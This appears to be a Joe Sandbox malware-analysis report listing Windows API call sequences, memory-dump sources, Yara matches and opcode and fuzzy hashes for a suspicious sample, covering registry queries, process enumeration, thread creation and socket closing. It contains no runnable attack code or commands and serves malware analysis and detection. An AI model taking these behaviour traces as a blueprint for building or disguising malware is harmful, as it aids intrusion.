                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 03626DD9
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,03645164,00000000,00020019,75BF73E0), ref: 03626DFC
                                                                                                                            • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03626E4A
                                                                                                                            • lstrcmpW.KERNEL32(?,03645148), ref: 03626E60
                                                                                                                            • lstrcpyW.KERNEL32(036256EA,?), ref: 03626E72
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                            • String ID: GROUP
                                                                                                                            • API String ID: 2102619503-2593425013
                                                                                                                            • Opcode ID: 9298a88e72d448070fb0ec399794742b497204abce480bbb1904fe34641bd3d2
                                                                                                                            • Instruction ID: 65bd94c6915575321ae620c35ff27274d91386729a99f697ae117968ed84ec03
                                                                                                                            • Opcode Fuzzy Hash: 9298a88e72d448070fb0ec399794742b497204abce480bbb1904fe34641bd3d2
                                                                                                                            • Instruction Fuzzy Hash: B231AA71904329BFDB20DF90DD89BDEBBB8FB08710F100299E515A7290DBB49A40CF54
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 02C37240
                                                                                                                            • __calloc_crt.LIBCMT ref: 02C3724C
                                                                                                                            • __getptd.LIBCMT ref: 02C37259
                                                                                                                            • CreateThread.KERNEL32(?,?,02C371B6,00000000,?,?), ref: 02C37290
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 02C3729A
                                                                                                                            • _free.LIBCMT ref: 02C372A3
                                                                                                                            • __dosmaperr.LIBCMT ref: 02C372AE
                                                                                                                              • Part of subcall function 02C3710D: __getptd_noexit.LIBCMT ref: 02C3710D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 155776804-0
                                                                                                                            • Opcode ID: 4f5b92379ffc907122ee000bfe557db2bceb5321fda3d616119a78bcc773067c
                                                                                                                            • Instruction ID: c286a0ada968e3ca8e95a64e656937b2230b9f1022515e00f0cecf577fabe808
                                                                                                                            • Opcode Fuzzy Hash: 4f5b92379ffc907122ee000bfe557db2bceb5321fda3d616119a78bcc773067c
                                                                                                                            • Instruction Fuzzy Hash: 251108B7100706AFEB13AFA5DC40E9BB7DAFF45374B100C29F91886140DB72D514DAA0
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0362FA4E
                                                                                                                            • __calloc_crt.LIBCMT ref: 0362FA5A
                                                                                                                            • __getptd.LIBCMT ref: 0362FA67
                                                                                                                            • CreateThread.KERNEL32(?,?,0362F9C4,00000000,?,?), ref: 0362FA9E
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0362FAA8
                                                                                                                            • _free.LIBCMT ref: 0362FAB1
                                                                                                                            • __dosmaperr.LIBCMT ref: 0362FABC
                                                                                                                              • Part of subcall function 0362F91B: __getptd_noexit.LIBCMT ref: 0362F91B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 155776804-0
                                                                                                                            • Opcode ID: fe74183a04429a1ef4c9a61f20fbf45159c695ea57df3eea8b063e5c0808fded
                                                                                                                            • Instruction ID: a92b999f64af15d3b89a3b9f42c89e58949e3b3e5a01f3ce36a1bc76bebc142e
                                                                                                                            • Opcode Fuzzy Hash: fe74183a04429a1ef4c9a61f20fbf45159c695ea57df3eea8b063e5c0808fded
                                                                                                                            • Instruction Fuzzy Hash: ED11E93A600B26BFD711EFA5DD4099B7FA8DF05B707160419F9148E290DB71D4018F68
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03627523), ref: 0362743D
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627444
                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03627523), ref: 03627452
                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03627523), ref: 0362745A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                            • API String ID: 3433367815-192647395
                                                                                                                            • Opcode ID: c11cbc4289d90fe721ef0beb39d5b5cd3dcdb0c2ecaecb01d4195204f3e866db
                                                                                                                            • Instruction ID: 034783fb2d999ca97800cc0913dbcc99e67444e0e76faa4e5ea46f498518ac16
                                                                                                                            • Opcode Fuzzy Hash: c11cbc4289d90fe721ef0beb39d5b5cd3dcdb0c2ecaecb01d4195204f3e866db
                                                                                                                            • Instruction Fuzzy Hash: 46014BB4E002099FCF50EFF49944AEEBFF5EB08200F5445A9EA59E3245E7359A10CF61
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 02C371BC
                                                                                                                              • Part of subcall function 02C39754: TlsGetValue.KERNEL32(00000000,02C398AD,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000), ref: 02C3975D
                                                                                                                              • Part of subcall function 02C39754: DecodePointer.KERNEL32(?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA,0000000D), ref: 02C3976F
                                                                                                                              • Part of subcall function 02C39754: TlsSetValue.KERNEL32(00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA), ref: 02C3977E
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 02C371C7
                                                                                                                              • Part of subcall function 02C39734: TlsGetValue.KERNEL32(?,?,02C371CC,00000000), ref: 02C39742
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 02C371DA
                                                                                                                              • Part of subcall function 02C39788: DecodePointer.KERNEL32(?,?,?,02C371DF,00000000,?,00000000), ref: 02C39799
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C371E3
                                                                                                                            • ExitThread.KERNEL32 ref: 02C371EA
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C371F0
                                                                                                                            • __freefls@4.LIBCMT ref: 02C37210
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2383549826-0
                                                                                                                            • Opcode ID: 7398fddb1fe519271883309175e14629fe64a72ce9833a52547cbb8ade808a32
                                                                                                                            • Instruction ID: 3f8d3af96736b89447eaaefb5eb5bdd41e0f05566b714ac37699053b9e1934b0
                                                                                                                            • Opcode Fuzzy Hash: 7398fddb1fe519271883309175e14629fe64a72ce9833a52547cbb8ade808a32
                                                                                                                            • Instruction Fuzzy Hash: A4F0B4B9400644AFC706BF71CD4894EBBEABF8A3543108D58E80887201DB38D846DFE0
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0362F9CA
                                                                                                                              • Part of subcall function 03633CA0: TlsGetValue.KERNEL32(00000000,03633DF9,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000), ref: 03633CA9
                                                                                                                              • Part of subcall function 03633CA0: DecodePointer.KERNEL32(?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06,0000000D), ref: 03633CBB
                                                                                                                              • Part of subcall function 03633CA0: TlsSetValue.KERNEL32(00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06), ref: 03633CCA
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0362F9D5
                                                                                                                              • Part of subcall function 03633C80: TlsGetValue.KERNEL32(?,?,0362F9DA,00000000), ref: 03633C8E
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 0362F9E8
                                                                                                                              • Part of subcall function 03633CD4: DecodePointer.KERNEL32(?,?,?,0362F9ED,00000000,?,00000000), ref: 03633CE5
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 0362F9F1
                                                                                                                            • ExitThread.KERNEL32 ref: 0362F9F8
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362F9FE
                                                                                                                            • __freefls@4.LIBCMT ref: 0362FA1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2383549826-0
                                                                                                                            • Opcode ID: d98808e6cb1cc285883377c44e673248fb0b28f20ec59bfe329a411fde87974f
                                                                                                                            • Instruction ID: 40cd50ab371d45a0ef926c4f9497bed703e05932f1a381cc5094bc8e6e5e9525
                                                                                                                            • Opcode Fuzzy Hash: d98808e6cb1cc285883377c44e673248fb0b28f20ec59bfe329a411fde87974f
                                                                                                                            • Instruction Fuzzy Hash: FCF0497CA00B10ABC708FF61CA0880E7FA8AF8A244332855CE9098F305DB34D442CBA9
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362607C
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03626088
                                                                                                                            • Process32FirstW.KERNEL32(00000000,00000000), ref: 036260B9
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0362610F
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03626116
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2526126748-0
                                                                                                                            • Opcode ID: e5298337bb4a84f39c5ec2438b9a15aced585c749dad4567df8cb55f1961a685
                                                                                                                            • Instruction ID: e2b4713079339c9d523786efeb51baa28a1020bafd6d0c035ce3cd01924eb788
                                                                                                                            • Opcode Fuzzy Hash: e5298337bb4a84f39c5ec2438b9a15aced585c749dad4567df8cb55f1961a685
                                                                                                                            • Instruction Fuzzy Hash: DC210735A00538ABDB20EF64DD59BFABBB8EF15310F150699ED0997284EB719A00CB54
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C332F1
                                                                                                                            • Sleep.KERNEL32(00000258), ref: 02C332FE
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C33306
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C33312
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C3331A
                                                                                                                            • Sleep.KERNEL32(0000012C), ref: 02C3332B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                             • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3137405945-0
                                                                                                                            • Opcode ID: 87487e45a74a04eeb8a1a19a1cf27b567b8bad26b076bb0badc9575d04833f03
                                                                                                                            • Instruction ID: 001bc9d16a975b1b58140a42cc261a1910b940383565a9013f7bac0a605da8c7
                                                                                                                            • Opcode Fuzzy Hash: 87487e45a74a04eeb8a1a19a1cf27b567b8bad26b076bb0badc9575d04833f03
                                                                                                                            • Instruction Fuzzy Hash: E9F0827A2443046BD610ABA9DC84F47F3E8AF95370B204B09F221872D0CAB0F8018BA0
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0362669B
                                                                                                                            • CoCreateInstance.OLE32(036446FC,00000000,00000001,0364471C,?,?,?,?,?,?,?,?,?,?,0362588A), ref: 036266B2
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0362674C
                                                                                                                            • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0362588A), ref: 0362677D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                                            • String ID: FriendlyName
                                                                                                                            • API String ID: 841178590-3623505368
                                                                                                                            • Opcode ID: 6b247c1d49db764e31059c3e6f6f5a07dcd125729ca410d4617ea7e68010c777
                                                                                                                            • Instruction ID: aba9455cb9fc7df1ca8e1a18c3fce600c599df9073f16e814c4347f9fdc73426
                                                                                                                            • Opcode Fuzzy Hash: 6b247c1d49db764e31059c3e6f6f5a07dcd125729ca410d4617ea7e68010c777
                                                                                                                            • Instruction Fuzzy Hash: 5C315C75B00605AFDB00DA99DC84EAEB7B9EF88704F148588F504EB354DB71E901CB60
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0362F721
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            • std::exception::exception.LIBCMT ref: 0362F756
                                                                                                                            • std::exception::exception.LIBCMT ref: 0362F770
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0362F781
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                            • String ID: bad allocation
                                                                                                                            • API String ID: 615853336-2104205924
                                                                                                                            • Opcode ID: 389636161816aef32392fed7a5e29ef118bffa8334f94bea3ee50ade91c9fcb1
                                                                                                                            • Instruction ID: dd6f967e5a586e2c8612b713ffb4ab1e730cb8c673b4bb8020cf29bcafc2392f
                                                                                                                            • Opcode Fuzzy Hash: 389636161816aef32392fed7a5e29ef118bffa8334f94bea3ee50ade91c9fcb1
                                                                                                                            • Instruction Fuzzy Hash: 45F02878D00B296FCB04FB14ED34A9E7FF9AB42204F25001DE814DE295DBB08A018F98
                                                                                                                            APIs
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02C32D3C
                                                                                                                            • CancelIo.KERNEL32(?), ref: 02C32D46
                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C32D4F
                                                                                                                            • closesocket.WS2_32(?), ref: 02C32D59
                                                                                                                            • SetEvent.KERNEL32(00000001), ref: 02C32D63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1486965892-0
                                                                                                                            • Opcode ID: c6dacf04cafee0e597929a149531abf3c023effd879e0191e2ffeb6bd81698fd
                                                                                                                            • Instruction ID: aceb3a2c06f47eb61cd4938c11d42f65ee281d5bc3e473547e4a10fddb34445f
                                                                                                                            • Opcode Fuzzy Hash: c6dacf04cafee0e597929a149531abf3c023effd879e0191e2ffeb6bd81698fd
                                                                                                                            • Instruction Fuzzy Hash: F2F03C7A540700ABD2209F54EC49B5777F8BB89B51F504B59F68296680C7B0B9048BE0
                                                                                                                            APIs
                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03622D5C
                                                                                                                            • CancelIo.KERNEL32(?), ref: 03622D66
                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03622D6F
                                                                                                                            • closesocket.WS2_32(?), ref: 03622D79
                                                                                                                            • SetEvent.KERNEL32(00000001), ref: 03622D83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1486965892-0
                                                                                                                            • Opcode ID: d0a7a9a09787ed929cbaa51fb95ba61686f218cdb8d196c906ffb494af4d330e
                                                                                                                            • Instruction ID: 2a642f82d791cc58d96a2d59fb21753aae2ab85e4f43efac95d0ac7b725e2223
                                                                                                                            • Opcode Fuzzy Hash: d0a7a9a09787ed929cbaa51fb95ba61686f218cdb8d196c906ffb494af4d330e
                                                                                                                            • Instruction Fuzzy Hash: FCF03C7A500704ABD334AF54DD59B6777B8BB49B11F204A1CF79297688C7B0B5048BA0
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 02C36F31
                                                                                                                              • Part of subcall function 02C36E83: __FF_MSGBANNER.LIBCMT ref: 02C36E9C
                                                                                                                              • Part of subcall function 02C36E83: __NMSG_WRITE.LIBCMT ref: 02C36EA3
                                                                                                                              • Part of subcall function 02C36E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36EC8
                                                                                                                            • std::exception::exception.LIBCMT ref: 02C36F66
                                                                                                                            • std::exception::exception.LIBCMT ref: 02C36F80
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 02C36F91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 615853336-0
                                                                                                                            • Opcode ID: cc7aceb83a5890e15f48985be58e8d8aeb65ad39a001d008c35994c0bee0dcf3
                                                                                                                            • Instruction ID: 000a5eed12ff597f3794b547df7aa4289859c9401c257602d801b3d647c69327
                                                                                                                            • Opcode Fuzzy Hash: cc7aceb83a5890e15f48985be58e8d8aeb65ad39a001d008c35994c0bee0dcf3
                                                                                                                            • Instruction Fuzzy Hash: 5CF0F47A940109BAEB02EBA5D810BAF7AEF9B44718F300818E409E6090DFB18B44DB59
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362316B
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 03623183
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362322F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$ExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4033114805-0
                                                                                                                            • Opcode ID: 5b28ac591bb99c4f7b9d09a087f6841f6aac5c4ae8a2ffb4c4c598092f837183
                                                                                                                            • Instruction ID: 12a83320524e364797332ef0aa42bbff804679c71eea85365e80a517e033165f
                                                                                                                            • Opcode Fuzzy Hash: 5b28ac591bb99c4f7b9d09a087f6841f6aac5c4ae8a2ffb4c4c598092f837183
                                                                                                                            • Instruction Fuzzy Hash: BC31AB78200A129FC718DF29C988A66BBE8FF44704B21C52CE95ACB719D735F842CF84
                                                                                                                            APIs
                                                                                                                            • __floor_pentium4.LIBCMT ref: 02C311E9
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C31226
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C31255
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2605973128-0
                                                                                                                            • Opcode ID: de669f62438cc9ef00450380b40db4f36ef31e4262ab97b89e41e92edcac9aff
                                                                                                                            • Instruction ID: ca3eec866222b930b4eb77283aed62d0042d76467832b7a5527a14ef2e53f441
                                                                                                                            • Opcode Fuzzy Hash: de669f62438cc9ef00450380b40db4f36ef31e4262ab97b89e41e92edcac9aff
                                                                                                                            • Instruction Fuzzy Hash: 3F21BE30E00309AFDB149FAAD885BAFFBF5FF40705F0089A9E849A2640E770A9108B50
                                                                                                                            APIs
                                                                                                                            • __floor_pentium4.LIBCMT ref: 036211E9
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03621226
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03621255
